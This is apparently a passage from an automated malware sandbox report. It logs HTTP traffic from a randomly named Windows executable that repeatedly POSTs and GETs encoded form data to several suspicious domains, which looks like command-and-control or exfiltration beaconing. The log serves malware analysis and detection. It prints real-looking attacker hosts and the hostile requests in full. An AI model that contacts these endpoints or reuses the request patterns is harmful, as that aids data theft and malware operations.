                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:10:27 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 548
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    15192.168.2.550000206.119.82.147803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:28.943103075 CEST1838OUTPOST /u0td/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.93wxd.top
                                                                                                                                                                                                                                    Origin: http://www.93wxd.top
                                                                                                                                                                                                                                    Referer: http://www.93wxd.top/u0td/
                                                                                                                                                                                                                                    Content-Length: 1245
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 4a 72 4c 79 57 35 51 6d 31 62 6c 59 34 39 73 64 74 32 52 63 4f 55 78 62 70 72 65 4e 30 55 55 4c 49 44 6d 45 76 74 69 65 6c 43 68 6e 51 41 48 69 46 38 56 76 6a 39 47 73 32 7a 4a 56 77 33 38 2b 42 30 77 37 6e 42 46 62 43 38 38 62 46 2f 30 56 56 2b 31 6e 54 63 72 53 59 2b 34 4d 77 44 59 69 53 6b 77 36 32 6b 59 61 52 6f 69 59 6b 33 45 45 4a 76 4b 55 67 39 48 67 37 32 77 78 6c 71 4e 38 78 65 4a 58 33 45 72 32 72 34 69 64 77 6b 4f 4b 57 74 54 44 30 73 37 54 2f 53 7a 36 6c 66 57 39 51 4c 46 55 61 36 6f 6c 35 67 49 35 54 67 71 42 59 70 66 6a 37 6d 55 62 38 7a 78 4c 58 50 71 75 64 4b 79 64 54 72 4a 64 39 74 46 68 75 47 70 59 69 77 71 51 72 37 6b 34 6f 2f 66 6d 41 49 37 67 6b 66 6a 53 51 55 61 38 66 6e 45 76 4f 49 50 7a 43 6a 2f 75 39 7a 5a 65 58 4e 70 30 36 39 65 62 72 48 36 5a 49 61 2b 58 4f 2f 37 73 61 59 52 70 71 70 53 48 6e 54 63 5a 35 71 6e 50 4b 35 43 4c 72 56 72 6d 52 30 5a 42 63 2f 59 39 55 69 75 4b 72 55 32 53 61 62 4d 73 62 6c 4c 73 2b 70 73 41 48 6d 46 47 33 72 65 33 72 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=JrLyW5Qm1blY49sdt2RcOUxbpreN0UULIDmEvtielChnQAHiF8Vvj9Gs2zJVw38+B0w7nBFbC88bF/0VV+1nTcrSY+4MwDYiSkw62kYaRoiYk3EEJvKUg9Hg72wxlqN8xeJX3Er2r4idwkOKWtTD0s7T/Sz6lfW9QLFUa6ol5gI5TgqBYpfj7mUb8zxLXPqudKydTrJd9tFhuGpYiwqQr7k4o/fmAI7gkfjSQUa8fnEvOIPzCj/u9zZeXNp069ebrH6ZIa+XO/7saYRpqpSHnTcZ5qnPK5CLrVrmR0ZBc/Y9UiuKrU2SabMsblLs+psAHmFG3re3rJdvpvDAh0zXJWUH2w32C9i9EVxmur7aBpI8qXiUULfq9pKu56LHlGaiM0MrUrlMVcr7IoY34nLrTWv7UIZfaK55EZ8Ovl5RlWNLRwdWfdYQEn4Mc4N+qFn8b0d8qmT1T3pB7LV0mwWs5JWOkAEfcZ1xDWrd1FN6vZRw7Fr/0Gq0Ny3gCUEyWWp4pKya++1WZMQDOXow2qYeU1x4CKFflLzdUjLNDjARwG9rmIjb9BKrrLHYqqqQYEpxcxo7pMxez3vhOVS8JJkzweRfSWO99b9MXYt+QXubE/H/ueeo9U2Qq8TessWI1qbb0S6ikXQ8Gq26PJQOWwwFGdHeQcDtRnVH4LGwwipRyrHoISlsTjoA2tpYilBh2Fg5NcAVkiUBPXMS6fPVAJVCVlxtuIrUJSktmNRE6Ps0+h5HKu3UfU9HwhKu4Ps9TmbMPPf5i/cK9/xcMZb9u9O4zdzH19owodFh68D0vYRcY1g/g2rVdZkxUhopQFoiBYxCD+lDJeFnZdhp1150AJDciwQTaKA4Z8y5HUYlKPg2awzh4LXkIc7+pLPYqMEk0GJNFebm+Qaf9OyHTsdQ3aiqzLxBZlmPgY0zMjIUyU+uxY/f5UUPSp9HqGx2K25oL0U21SUIAPc8fmERN+CJ9T/qzoghVRgAwuoYEikENGAhBem [TRUNCATED]
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:29.825510025 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:10:29 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 548
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    16192.168.2.550001206.119.82.147803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:31.477698088 CEST551OUTGET /u0td/?BHNhDJjp=EpjSVPpO4pF17PlQ3DNgKhd2v7ja1FkLRxKjmJiLsn9eFCahEsp5jtnh1y932jU+ck47tHBUUsolNvMtAutbQ5HDaIUs2x8kIyYJtigiYamWvQ0ME/HlpqSu5UMEi5UFjQ==&KteDo=fX0Hm8kxa HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.93wxd.top
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:32.372220993 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:10:32 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 548
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    17192.168.2.55000285.159.66.93803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:37.611212969 CEST831OUTPOST /vd6t/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.meramhaliyikama.xyz
                                                                                                                                                                                                                                    Origin: http://www.meramhaliyikama.xyz
                                                                                                                                                                                                                                    Referer: http://www.meramhaliyikama.xyz/vd6t/
                                                                                                                                                                                                                                    Content-Length: 209
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 61 59 4b 70 6a 33 4f 77 50 6b 34 41 6f 6b 30 67 58 32 59 38 55 7a 66 46 43 61 78 48 4a 59 6d 4f 52 30 34 44 6a 38 6b 66 74 30 6e 79 70 57 73 70 7a 32 48 57 36 62 61 77 6e 46 54 51 65 42 74 75 4e 67 33 6d 78 2f 33 74 43 52 7a 61 77 44 6a 48 6e 77 6f 63 4c 44 72 66 44 68 69 77 6b 59 35 4d 73 55 33 76 67 69 37 45 73 6d 34 55 65 30 37 6c 62 39 5a 43 5a 4e 61 57 77 53 73 47 74 53 31 33 4f 61 45 57 4a 35 47 42 34 73 6d 70 33 36 65 41 45 68 35 52 53 69 6a 30 77 51 6d 69 4d 45 53 46 65 39 56 51 6d 52 56 41 79 50 32 58 66 69 55 56 7a 58 41 33 66 4b 43 62 62 4e 77 31 4d 30 2f 43 63 6b 47 69 6e 68 59 3d
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=aYKpj3OwPk4Aok0gX2Y8UzfFCaxHJYmOR04Dj8kft0nypWspz2HW6bawnFTQeBtuNg3mx/3tCRzawDjHnwocLDrfDhiwkY5MsU3vgi7Esm4Ue07lb9ZCZNaWwSsGtS13OaEWJ5GB4smp36eAEh5RSij0wQmiMESFe9VQmRVAyP2XfiUVzXA3fKCbbNw1M0/CckGinhY=


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    18192.168.2.55000385.159.66.93803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:40.151999950 CEST851OUTPOST /vd6t/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.meramhaliyikama.xyz
                                                                                                                                                                                                                                    Origin: http://www.meramhaliyikama.xyz
                                                                                                                                                                                                                                    Referer: http://www.meramhaliyikama.xyz/vd6t/
                                                                                                                                                                                                                                    Content-Length: 229
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 61 59 4b 70 6a 33 4f 77 50 6b 34 41 70 45 6b 67 55 56 77 38 63 7a 66 4b 48 61 78 48 41 34 6d 4b 52 30 6b 44 6a 39 67 70 74 47 44 79 70 79 6b 70 38 58 48 57 35 62 61 77 73 6c 54 52 54 68 74 6c 4e 67 36 5a 78 36 66 74 43 56 62 61 77 42 4c 48 6e 6a 77 62 61 44 72 64 49 42 69 49 35 49 35 4d 73 55 33 76 67 69 76 75 73 6d 77 55 66 45 6e 6c 4b 6f 74 44 52 74 61 56 35 79 73 47 36 43 30 38 4f 61 46 46 4a 39 47 6e 34 70 69 70 33 37 43 41 46 77 35 51 59 69 6a 32 30 51 6e 6e 4a 30 33 65 62 2f 55 62 71 44 41 6e 70 2b 2f 70 58 30 35 2f 70 31 49 66 4d 71 75 6a 4c 65 34 43 64 45 65 72 47 48 57 53 35 32 50 58 59 50 42 6f 62 59 4f 51 64 6c 45 71 67 73 43 69 2f 6a 47 4e
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=aYKpj3OwPk4ApEkgUVw8czfKHaxHA4mKR0kDj9gptGDypykp8XHW5bawslTRThtlNg6Zx6ftCVbawBLHnjwbaDrdIBiI5I5MsU3vgivusmwUfEnlKotDRtaV5ysG6C08OaFFJ9Gn4pip37CAFw5QYij20QnnJ03eb/UbqDAnp+/pX05/p1IfMqujLe4CdEerGHWS52PXYPBobYOQdlEqgsCi/jGN


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    19192.168.2.55000485.159.66.93803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:42.702403069 CEST1868OUTPOST /vd6t/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.meramhaliyikama.xyz
                                                                                                                                                                                                                                    Origin: http://www.meramhaliyikama.xyz
                                                                                                                                                                                                                                    Referer: http://www.meramhaliyikama.xyz/vd6t/
                                                                                                                                                                                                                                    Content-Length: 1245
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 61 59 4b 70 6a 33 4f 77 50 6b 34 41 70 45 6b 67 55 56 77 38 63 7a 66 4b 48 61 78 48 41 34 6d 4b 52 30 6b 44 6a 39 67 70 74 47 4c 79 70 41 38 70 39 30 76 57 34 62 61 77 68 46 54 55 54 68 74 43 4e 67 79 56 78 36 54 58 43 58 54 61 7a 69 7a 48 33 43 77 62 44 54 72 64 48 68 69 7a 6b 59 35 5a 73 56 62 72 67 69 2f 75 73 6d 77 55 66 46 58 6c 61 4e 5a 44 63 4e 61 57 77 53 73 4b 74 53 31 62 4f 62 73 77 4a 39 4b 52 34 64 57 70 32 62 53 41 44 43 68 51 65 79 6a 34 35 77 6e 42 4a 30 4c 37 62 2f 4a 6b 71 43 31 43 70 35 37 70 47 69 59 65 30 57 70 45 51 71 75 53 4d 2b 4d 35 44 30 43 58 4f 6b 61 71 2b 6e 6e 72 48 39 52 34 52 74 2b 53 66 55 78 51 78 72 53 53 34 54 6a 39 6b 4a 48 78 61 51 74 59 4a 55 6f 77 4f 77 63 37 62 39 31 64 57 58 66 57 54 58 4d 31 47 65 4a 55 53 68 48 4f 72 42 48 45 53 34 33 79 45 6f 6c 64 58 37 58 47 4d 33 33 68 6b 44 47 2f 58 51 30 31 79 36 4d 37 75 79 59 66 69 4f 7a 55 56 47 75 53 58 65 6d 56 53 6a 6f 4a 78 2f 43 37 5a 38 79 48 76 56 4a 2b 2f 44 43 45 73 39 45 42 73 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=aYKpj3OwPk4ApEkgUVw8czfKHaxHA4mKR0kDj9gptGLypA8p90vW4bawhFTUThtCNgyVx6TXCXTazizH3CwbDTrdHhizkY5ZsVbrgi/usmwUfFXlaNZDcNaWwSsKtS1bObswJ9KR4dWp2bSADChQeyj45wnBJ0L7b/JkqC1Cp57pGiYe0WpEQquSM+M5D0CXOkaq+nnrH9R4Rt+SfUxQxrSS4Tj9kJHxaQtYJUowOwc7b91dWXfWTXM1GeJUShHOrBHES43yEoldX7XGM33hkDG/XQ01y6M7uyYfiOzUVGuSXemVSjoJx/C7Z8yHvVJ+/DCEs9EBsv7qZVvEFrmnfeYNwq3lqTgTYisAMnGR2g78wQTqp05er6HXhL0PvOwfDKeyR6a/8v3hlQeM12QSzvEFC4nKf/lycovnJij5vIpPo3lHAUxkapcGk4TLuz2KOKVy3NiUZ1ecjqyIjjrxl6vCUNBZW017cQBJh3dqE68v9mBduMl1T49DpH6LbU3dq4UtKAWO0jFRKMnLt/uw/80hqET2+/QwYmfky5Rkqp3IyBGstvg3isxFgPzcPMPGhYbRVIcmE+YHE/doOM6MBB5+b7S1pcBuRZHMiwEJAgj92fb45qNL1gLq06PtKuVT11oRtzOCtha4JNRXF94PWDaRf4gy2LHpxSXTEYGxHuwetFStFhQHoFEw+XQHRf+8LnfTCAFX0FaN4dwBFJbqYYd6UtXxc8Kvz0IqbmZqexl/LiGylLzSbBasDvAUmqjWuAnMHPu1IfaNzO3IlW80ao/6UpDtBMjP94yRnPu7NvSSlOKA3QHb0MlHabTXmsOnmMcd1DYrxkK62wmd6RPqAA+s/GXRFieBNRaHbNiPtOA6CNXDUtA8Zsl6G5ve8ysCTQcbjlq+PMdEwuOFTHkhlqwvI4ypW+PDLPG9guROMDdOygv0IdGMZLBNPFQGvcU/ETb/1DnVhls88JciOTQZeoEkqG88hoXIcfyEQWJW4iA [TRUNCATED]


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    20192.168.2.55000585.159.66.93803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:45.294245958 CEST561OUTGET /vd6t/?BHNhDJjp=XaiJgAiuFnMEtmZURD8Lc3raCMtFBuupNnQYn/g1mG/l0yZG2F7WlL2GsGHsclNHOTCW0P35DR3+uir5yxADGkXKDk67ta12miPg21T/nG4AWXn5T49Yc7XX4Q8eijQzNQ==&KteDo=fX0Hm8kxa HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.meramhaliyikama.xyz
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:45.986139059 CEST225INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx/1.14.1
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:10:45 GMT
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    X-Rate-Limit-Limit: 5s
                                                                                                                                                                                                                                    X-Rate-Limit-Remaining: 19
                                                                                                                                                                                                                                    X-Rate-Limit-Reset: 2024-10-11T13:10:50.8884704Z


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    21192.168.2.550006104.21.42.219803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.035074949 CEST816OUTPOST /bk4m/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.n-paylity.shop
                                                                                                                                                                                                                                    Origin: http://www.n-paylity.shop
                                                                                                                                                                                                                                    Referer: http://www.n-paylity.shop/bk4m/
                                                                                                                                                                                                                                    Content-Length: 209
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 77 63 48 65 4c 70 4b 39 64 4d 5a 32 36 6a 71 62 47 6a 33 67 42 2f 59 32 63 52 6f 73 4e 36 50 2b 35 51 54 77 6a 54 48 4d 6a 61 67 6b 75 31 4c 71 6c 63 52 74 67 76 2f 77 72 53 77 2f 63 65 43 58 52 76 4c 72 4c 69 75 6e 77 33 70 6b 77 46 45 4a 7a 73 2f 67 72 7a 4a 67 70 62 7a 47 78 36 47 5a 4f 74 4d 6b 61 38 46 33 6e 54 45 56 68 41 66 69 52 74 73 35 2f 6f 6a 61 6f 4d 64 58 78 4d 72 77 65 79 63 74 6d 49 55 62 50 68 57 58 74 6e 61 45 47 6f 6e 5a 51 62 54 45 66 56 64 4c 56 77 70 2b 71 6c 6f 36 79 72 43 30 45 4a 4e 63 63 4f 6b 54 30 6e 45 71 67 35 39 77 41 38 76 76 45 37 6d 4e 5a 30 65 39 66 37 30 3d
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=wcHeLpK9dMZ26jqbGj3gB/Y2cRosN6P+5QTwjTHMjagku1LqlcRtgv/wrSw/ceCXRvLrLiunw3pkwFEJzs/grzJgpbzGx6GZOtMka8F3nTEVhAfiRts5/ojaoMdXxMrweyctmIUbPhWXtnaEGonZQbTEfVdLVwp+qlo6yrC0EJNccOkT0nEqg59wA8vvE7mNZ0e9f70=
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.990077972 CEST876INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:10:51 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
